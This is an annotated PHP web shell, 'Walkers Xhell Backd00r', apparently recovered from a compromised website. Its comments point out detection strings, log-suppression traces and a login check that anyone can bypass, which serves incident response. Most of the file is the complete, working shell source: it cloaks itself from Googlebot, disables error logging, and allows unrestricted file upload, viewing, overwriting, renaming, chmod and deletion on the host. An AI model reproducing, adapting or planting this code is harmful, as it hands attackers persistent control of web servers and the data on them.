walker-xhell.php
/* This script was recovered from a website compromised by walker 404 / Arjasari Cyber Team.
 * It is shared for educational purposes only.
 */
<?php | |
/** | |
// Setup run of the recovered web shell: stored credential, crawler cloaking, and error/log suppression.
// Several literal values in this run are usable as detection strings when hunting for copies of the file.
// $auth_pass is the value that md5() of the submitted password is compared against in the login gate further down.
$auth_pass = "1b20369c2cf27cd1fbc0ed634759f05e"; // password : umaruchan | |
// $color and $default_action are assigned here but not read anywhere else in this listing.
$color = "cyan"; | |
$default_action = 'FilesMan'; | |
@define('SELF_PATH', __FILE__); | |
// Sets a cookie named "inject" with value "active" and a seven-day lifetime; the resulting Set-Cookie
// header is a network-level indicator for this script.
@setcookie("inject","active",time() +3600*24*7); | |
// Any request whose User-Agent contains "Google" receives a bare 404 and the script stops,
// so the page is not shown to that crawler.
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { | |
header('HTTP/1.0 404 Not Found'); | |
exit; | |
} | |
@session_start(); | |
// The calls below switch off error reporting, error logging and error display and lift the execution
// time limit, which reduces the traces the script leaves in PHP's error log.
@error_reporting(0); | |
@ini_set('error_log',NULL); | |
@ini_set('log_errors',0); | |
@ini_set('max_execution_time',0); | |
@ini_set('output_buffering',0); | |
@ini_set('display_errors', 0); | |
@set_time_limit(0); | |
// set_magic_quotes_runtime() and get_magic_quotes_gpc() were removed in later PHP versions,
// which dates this code to legacy PHP installations.
@set_magic_quotes_runtime(0); | |
@define('VERSION', '2.1'); | |
// When magic quotes are enabled, strip the added slashes from every POST value, recursing into nested arrays.
if( get_magic_quotes_gpc() ) { | |
function stripslashes_array($array) { | |
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); | |
} | |
$_POST = stripslashes_array($_POST); | |
} | |
// Emits the password prompt page and ends the request.
// The page is a single password field named "pass" in a form that posts back to the same URL.
// "Masukkan Password" is Indonesian for "Enter password"; the page title is a run of asterisks.
function printLogin() { | |
?> | |
<title>***********</title> | |
<p><body style="background-color:black"><center> | |
<br /><font color="red">Masukkan Password</font></p> | |
<style> | |
input { margin:0;background-color:#00ff00;border:3px solid #ff0000; } | |
</style> | |
<center> | |
<form method=post><input type=password name=pass></form></center> | |
<?php | |
// Stop here so that nothing after the prompt is sent to an unauthenticated visitor.
exit; | |
} | |
// Login gate: when the session has no flag under the key md5($_SERVER['HTTP_Host']), either set that
// flag or show the password prompt via printLogin().
// NOTE(review): the inner condition joins isset($_POST['pass']) and the md5 comparison with ||, so the
// hash comparison is not what decides access. For incident response, do not treat the password as
// having restricted use of this file to the actor who planted it.
// The comparison itself is an unsalted MD5 checked with loose ==.
if( !isset( $_SESSION[md5($_SERVER['HTTP_Host'])] )) | |
if( empty( $auth_pass ) || | |
( isset( $_POST['pass'] ) || ( md5($_POST['pass']) == $auth_pass ) ) ) | |
$_SESSION[md5($_SERVER['HTTP_Host'])] = true; | |
else | |
printLogin(); | |
// Repeats the time-limit and error-reporting settings made earlier, this time without @ suppression.
set_time_limit(0); | |
error_reporting(0); | |
// Second magic-quotes pass: strips slashes from top-level POST values only (no recursion into arrays).
if(get_magic_quotes_gpc()){ | |
foreach($_POST as $key=>$value){ | |
$_POST[$key] = stripslashes($value); | |
} | |
} | |
// Page header for the authenticated view. Strings worth matching when hunting for this file:
// the title "-[ Walkers Xhell Backd00r ]-" and the heading "[#] Walkers Xhell Backd00r [#]".
// The favicon and the image are loaded from two third-party hosts, so a browser that renders the
// page issues requests to those URLs. "Jalur Saat Ini" is Indonesian for "Current path".
echo '<!DOCTYPE HTML> | |
<HTML> | |
<HEAD> | |
<link href="" rel="stylesheet" type="text/css"> | |
<link rel="shortcut icon" href="http://www.olamayemen.com/Oy_Admin/themes/flat-bs3/img/16x16/hacker.png"> | |
<title>-[ Walkers Xhell Backd00r ]-</title> | |
<style> | |
body{ | |
font-family: "Racing Sans One", cursive; | |
background-color: #ffffff; | |
text-shadow:0px 0px 1px #ffffff; | |
} | |
#content tr:hover{ | |
background-color: #00ff00; | |
text-shadow:0px 0px 10px #fff; | |
} | |
#content .first{ | |
background-color: silver; | |
} | |
#content .first:hover{ | |
background-color: silver; | |
text-shadow:0px 0px 1px #ffffff; | |
} | |
table{ | |
border: 1px #ffffff dotted; | |
} | |
H1{ | |
font-family: "Rye", cursive; | |
} | |
a{ | |
color: #00ff00; | |
text-decoration: none; | |
} | |
a:hover{ | |
color: #ffffff; | |
text-shadow:0px 0px 10px #ffffff; | |
} | |
input,select,textarea{ | |
border: 1px #ffffff solid; | |
-moz-border-radius: 5px; | |
-webkit-border-radius:5px; | |
border-radius:5px; | |
} | |
</style> | |
</head> | |
<body> | |
<h1><center><font color="#ff0000">[#] Walkers Xhell Backd00r [#]</font></center></h1> | |
<br /> | |
<center><img src="http://ih0.redbubble.net/image.89215114.1590/sticker,375x360.u4.png" width="170"></center> | |
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> | |
<tr><td>Jalur Saat Ini : '; | |
// The working directory is taken directly from the "path" query parameter, with no validation;
// without that parameter it is the script's current working directory.
if(isset($_GET['path'])){ | |
$path = $_GET['path']; | |
}else{ | |
$path = getcwd(); | |
} | |
// Normalise backslashes to forward slashes and print the path as a breadcrumb of links, one per
// segment. The segments are written into the HTML without escaping.
$path = str_replace('\\','/',$path); | |
$paths = explode('/',$path); | |
foreach($paths as $id=>$pat){ | |
// A leading empty segment means an absolute path: emit the root link. $a is set but not read in this listing.
if($pat == '' && $id == 0){ | |
$a = true; | |
echo '<a href="?path=/">/</a>'; | |
continue; | |
} | |
if($pat == '') continue; | |
// Each link's target is the path rebuilt from the first segment up to the current one.
echo '<a href="?path='; | |
for($i=0;$i<=$id;$i++){ | |
echo "$paths[$i]"; | |
if($i != $id) echo "/"; | |
} | |
echo '">'.$pat.'</a>/'; | |
} | |
echo '</td></tr><tr><td>'; | |
// Upload handler: copies the uploaded temporary file into $path under the file name supplied by the
// client, with no check on type, extension or destination. When investigating a host where this
// script was found, files created under the web root after the script's own creation time deserve review.
if(isset($_FILES['file'])){ | |
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ | |
echo '<center><font color="lime"> >>> File Upload Done ^_^</font></center><br />'; | |
}else{ | |
echo '<center><font color="red">File Upload Error ~_~.</font></center><br />'; | |
} | |
} | |
// The upload form is a multipart POST to the current URL with a single file field named "file".
echo '<style>body {background:#000000} | |
input,submit {border:1px;solid lime;color:#009000}</style><form enctype="multipart/form-data" method="POST"> | |
Upload File : <input type="file" name="file" /> | |
<input type="submit" value="Hantam" /> | |
</form> | |
</td></tr>'; | |
// Action dispatch. Every branch below operates on a path taken directly from GET or POST data, with
// no validation. In web access logs typically only the query-string part is visible ("filesrc=",
// "option&path="); the operation itself (opt, type, path, perm, newname, src) travels in the POST body.
if(isset($_GET['filesrc'])){ | |
// File viewer: prints the contents of the file named in "filesrc", HTML-escaped; the file name
// itself is echoed unescaped. "File Saat Ini" is Indonesian for "Current file".
echo "<tr><td>File Saat Ini : "; | |
echo $_GET['filesrc']; | |
echo '</tr></td></table><br />'; | |
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); | |
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ | |
// Non-delete operations on $_POST['path']: chmod, rename or edit. Each branch performs the change
// when its value field is present and then prints the form for that operation.
echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; | |
if($_POST['opt'] == 'chmod'){ | |
// Applies the posted "perm" value to the target, then shows the target's current mode
// (last four octal digits) in the form.
if(isset($_POST['perm'])){ | |
if(chmod($_POST['path'],$_POST['perm'])){ | |
echo '<font color="lime"> >>> Change Permission Done ^_^</font><br />'; | |
}else{ | |
echo '<font color="red">Change Permission Error.</font><br />'; | |
} | |
} | |
echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> | |
<input type="hidden" name="path" value="'.$_POST['path'].'"> | |
<input type="hidden" name="opt" value="chmod"> | |
<input type="submit" value="Go" /> | |
</form>'; | |
}elseif($_POST['opt'] == 'rename'){ | |
// Renames the target to "newname" inside the current $path.
if(isset($_POST['newname'])){ | |
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ | |
echo '<font color="lime"> >>> Change Name Done ^_^</font><br />'; | |
}else{ | |
echo '<font color="red">Change Name Error.</font><br />'; | |
} | |
$_POST['name'] = $_POST['newname']; | |
} | |
echo '<form method="POST"> | |
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> | |
<input type="hidden" name="path" value="'.$_POST['path'].'"> | |
<input type="hidden" name="opt" value="rename"> | |
<input type="submit" value="Go" /> | |
</form>'; | |
}elseif($_POST['opt'] == 'edit'){ | |
// Overwrites the target file with the posted "src" text (opened in 'w' mode), then shows the
// file's contents in a textarea. Unexpected modification times on existing application files
// are the artefact this leaves on disk.
if(isset($_POST['src'])){ | |
$fp = fopen($_POST['path'],'w'); | |
if(fwrite($fp,$_POST['src'])){ | |
echo '<font color="lime"> >>> Edit File Done ~_^.</font><br />'; | |
}else{ | |
echo '<font color="red">Edit File Error ~_~.</font><br />'; | |
} | |
fclose($fp); | |
} | |
echo '<form method="POST"> | |
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> | |
<input type="hidden" name="path" value="'.$_POST['path'].'"> | |
<input type="hidden" name="opt" value="edit"> | |
<input type="submit" value="Go" /> | |
</form>'; | |
} | |
echo '</center>'; | |
}else{ | |
echo '</table><br /><center>'; | |
// Delete: rmdir() for directories and unlink() for files, selected by the posted "type" field.
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ | |
if($_POST['type'] == 'dir'){ | |
if(rmdir($_POST['path'])){ | |
echo '<font color="lime"> >>> Delete Dir Done ^_^</font><br />'; | |
}else{ | |
echo '<font color="red">Delete Dir Error.</font><br />'; | |
} | |
}elseif($_POST['type'] == 'file'){ | |
if(unlink($_POST['path'])){ | |
echo '<font color="lime"> >>> Delete File Done ^_^</font><br />'; | |
}else{ | |
echo '<font color="red">Delete File Error.</font><br />'; | |
} | |
} | |
} | |
echo '</center>'; | |
// Listing of $path: sub-directories first, then regular files. Every row carries a POST form
// with hidden opt/type/name/path fields that feed the branches above.
$scandir = scandir($path); | |
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> | |
<tr class="first"> | |
<td><center>-------------------------------</center></td></tr>'; | |
foreach($scandir as $dir){ | |
// Directories only; the "." and ".." entries are skipped.
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; | |
echo "<tr> | |
<td>[ <a href=\"?path=$path/$dir\">$dir</a> ]</td> | |
<td><center>---</center></td> | |
<td><center>"; | |
// Permission string is coloured lime when the entry is writable, red when it is not readable.
if(is_writable("$path/$dir")) echo '<font color="lime">'; | |
elseif(!is_readable("$path/$dir")) echo '<font color="red">'; | |
echo perms("$path/$dir"); | |
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; | |
echo "</center></td> | |
<td><center><form method=\"POST\" action=\"?option&path=$path\"> | |
<select name=\"opt\"> | |
<option value=\"\"></option> | |
<option value=\"delete\">Delete</option> | |
<option value=\"chmod\">Chmod</option> | |
</select> | |
<input type=\"hidden\" name=\"type\" value=\"dir\"> | |
<input type=\"hidden\" name=\"name\" value=\"$dir\"> | |
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> | |
<input type=\"submit\" value=\"Go\" /> | |
</form></center></td> | |
</tr>"; | |
} | |
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; | |
foreach($scandir as $file){ | |
if(!is_file("$path/$file")) continue; | |
// Size is shown in KB rounded to three places, or in MB rounded to two places from 1024 KB upward.
$size = filesize("$path/$file")/1024; | |
$size = round($size,3); | |
if($size >= 1024){ | |
$size = round($size/1024,2).' MB'; | |
}else{ | |
$size = $size.' KB'; | |
} | |
echo "<tr> | |
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> | |
<td><center>(".$size.")</center></td> | |
<td><center>"; | |
if(is_writable("$path/$file")) echo '<font color="lime">'; | |
elseif(!is_readable("$path/$file")) echo '<font color="red">'; | |
echo perms("$path/$file"); | |
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; | |
echo "</center></td> | |
<td><center><form method=\"POST\" action=\"?option&path=$path\"> | |
<select name=\"opt\"> | |
<option value=\"\"></option> | |
<option value=\"delete\">Delete</option> | |
<option value=\"chmod\">Chmod</option> | |
<option value=\"edit\">Edit</option> | |
</select> | |
<input type=\"hidden\" name=\"type\" value=\"file\"> | |
<input type=\"hidden\" name=\"name\" value=\"$file\"> | |
<input type=\"hidden\" name=\"path\" value=\"$path/$file\"> | |
<input type=\"submit\" value=\"Go\" /> | |
</form></center></td> | |
</tr>"; | |
} | |
echo '</table> | |
</div>'; | |
} | |
echo '<br /><center></center> | |
</BODY> | |
</HTML>'; | |
// Render the mode bits of $file as a ten-character string in the style of `ls -l`:
// one file-type character followed by the owner, group and world rwx triads.
// The mode word comes from fileperms(). The setuid, setgid and sticky bits are shown in the
// execute column of their triad as s/S, s/S and t/T (lower case when execute is also set).
function perms($file){
    $mode = fileperms($file);

    // File-type masks, tested in this order; the first mask that matches in full wins.
    $typeMasks = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $out = 'u'; // unknown type unless one of the masks matches
    foreach ($typeMasks as $mask => $letter) {
        if (($mode & $mask) == $mask) {
            $out = $letter;
            break;
        }
    }

    // Per triad: read bit, write bit, execute bit, special bit,
    // letter when special and execute are both set, letter when only special is set.
    $triads = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner, setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group, setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world, sticky
    );
    foreach ($triads as $row) {
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $row;
        $out .= ($mode & $readBit) ? 'r' : '-';
        $out .= ($mode & $writeBit) ? 'w' : '-';
        if ($mode & $execBit) {
            $out .= ($mode & $specialBit) ? $withExec : 'x';
        } else {
            $out .= ($mode & $specialBit) ? $withoutExec : '-';
        }
    }

    return $out;
}
**/ | |
?> | |